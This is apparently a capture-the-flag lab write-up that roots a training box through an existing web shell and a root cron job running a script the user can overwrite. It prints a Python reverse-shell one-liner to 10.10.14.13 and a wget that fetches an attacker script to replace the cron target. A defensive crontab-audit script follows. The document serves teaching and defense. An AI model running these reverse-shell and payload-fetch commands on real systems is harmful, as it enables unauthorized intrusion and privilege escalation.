Nmap scan for all TCP ports
sudo nmap -T4 -p- -oN T-all 10.10.10.68
# Nmap 7.70 scan initiated Tue Jul 2 23:33:14 2019 as: nmap -T4 -p- -oN T-all 10.10.10.68
Nmap scan report for 10.10.10.68
Host is up (0.24s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http
# Nmap done at Tue Jul 2 23:44:27 2019 -- 1 IP address (1 host up) scanned in 672.99 seconds
Only one attack vector, i.e. the HTTP server on port 80.
sudo nmap -p 80 -sV -sC -oN O-Detailed 10.10.10.68
# Nmap 7.70 scan initiated Tue Jul 2 23:37:00 2019 as: nmap -p 80 -sV -sC -oN O-Detailed 10.10.10.68
Nmap scan report for 10.10.10.68
Host is up (0.23s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jul 2 23:37:12 2019 -- 1 IP address (1 host up) scanned in 12.61 seconds
No searchsploit results for this particular version of Apache httpd.
Ran gobuster against the server to get a few directories to explore:
gobuster dir -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-medium -u http://10.10.10.68
/uploads (Status: 301)
/images (Status: 301)
/php (Status: 301)
/css (Status: 301)
/dev (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
The dev directory seemed interesting; uploads, however, was empty. phpbash.php, a web shell already installed on the server, gave us the user flag:
> cat /home/arrexel/user.txt
2c281***
Another thing to notice was that the user www-data is able to run commands as scriptmanager without a password, and there is an interesting folder owned by scriptmanager in the root directory.
sudo -u scriptmanager ls -la /scripts
total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Dec  4  2017 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Jul  4 02:44 test.txt   [TIME CHANGED]
-------------------------------
-rw-r--r--  1 root          root            12 Jul  4 03:03 test.txt   [TIME CHANGED]
LinEnum.sh
I got a reverse shell from the existing web shell. Using a Python HTTP server I downloaded LinEnum.sh onto the box and ran it to see what was interesting.
sudo -u scriptmanager python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.13",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' &
There was nothing too exciting in the output except the fact that there were some crontabs registered for the user root. As evident from the listing of the /scripts/ folder, the text file was being regenerated every minute, as noted above.
The code which was being run was:
f = open("test.txt", "w")
f.write("testing 123!")
f.close
As evident from the permissions, this file can be modified by the scriptmanager user and hence can be used to our advantage.
Craft the following Python script on the attacker system, transfer it, replace the file on the machine, and wait for the output.
import os
cmd = "cat /root/root.txt > /tmp/root"
os.system(cmd)
sudo -u scriptmanager wget http://10.10.14.13:9999/script.py -O /scripts/test.py
After one minute we will have our root flag in /tmp/root:
> cat /tmp/root
cc4f0***
Take a closer look at suspicious root-owned files, as these may give away important information; in this case the change in timestamp every minute was the clue to a root-owned
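The misconfiguration used here, a root cron job executing a script that a non-root user can replace, is something a defender can check for on a host. The following Python audit is an added example, not part of the original writeup or the box; the crontab lines and the file ownership data are constructed to mirror the /scripts listing above (scriptmanager is assumed to be uid 1001, and the logrotate entry is an invented root-controlled control case), while stat_lookup is provided for use on a live host.

```python
import os
import re
import stat
from collections import namedtuple
from typing import Callable, List, Optional

FileInfo = namedtuple("FileInfo", "uid gid mode")  # mode holds permission bits only, e.g. 0o644
CRON_RE = re.compile(r"^\s*(?:\S+\s+){5}(?P<cmd>\S.*)$")  # five schedule fields, then the command

def absolute_paths(cmd: str) -> List[str]:
    """All absolute paths in a cron command, split on whitespace and shell operators."""
    return [t for t in re.split(r"[\s;&|]+", cmd) if t.startswith("/")]

def writable_by_non_root(info: FileInfo) -> bool:
    """Non-root owner, world-writable, or group-writable with a non-root group."""
    return info.uid != 0 or bool(info.mode & stat.S_IWOTH) or (bool(info.mode & stat.S_IWGRP) and info.gid != 0)

def audit_crontab(lines: List[str], lookup: Callable[[str], Optional[FileInfo]]) -> List[str]:
    """Flag root cron commands whose script, or the directory holding it, is not root-controlled."""
    findings = []
    for line in (raw.strip() for raw in lines):
        m = CRON_RE.match(line)
        if line.startswith("#") or not m:
            continue
        for path in absolute_paths(m.group("cmd")):
            for candidate in (path, os.path.dirname(path)):  # the file, then its parent directory
                info = lookup(candidate)
                if info is not None and writable_by_non_root(info):
                    findings.append(f"{candidate} uid={info.uid} mode={info.mode:o} run by root: {line}")
                    break
    return findings

def stat_lookup(path: str) -> Optional[FileInfo]:
    """Live-host lookup: pass this instead of SAMPLE_FS.get to audit a real crontab."""
    try:
        st = os.stat(path)
        return FileInfo(st.st_uid, st.st_gid, stat.S_IMODE(st.st_mode))
    except OSError:
        return None

# Constructed sample after the listing above: scriptmanager-owned (uid 1001 assumed), group-writable /scripts; logrotate is the root-controlled control case.
SAMPLE_FS = {
    "/scripts": FileInfo(1001, 1001, 0o774),
    "/scripts/test.py": FileInfo(1001, 1001, 0o644),
    "/etc/cron.hourly/logrotate": FileInfo(0, 0, 0o755),
}
SAMPLE_CRON = ["# constructed root crontab",
               "* * * * * python /scripts/test.py",
               "0 * * * * /etc/cron.hourly/logrotate"]
```

Running audit_crontab(SAMPLE_CRON, SAMPLE_FS.get) reports only the test.py entry; on a real host, feed it the lines of /etc/crontab and root's crontab together with stat_lookup.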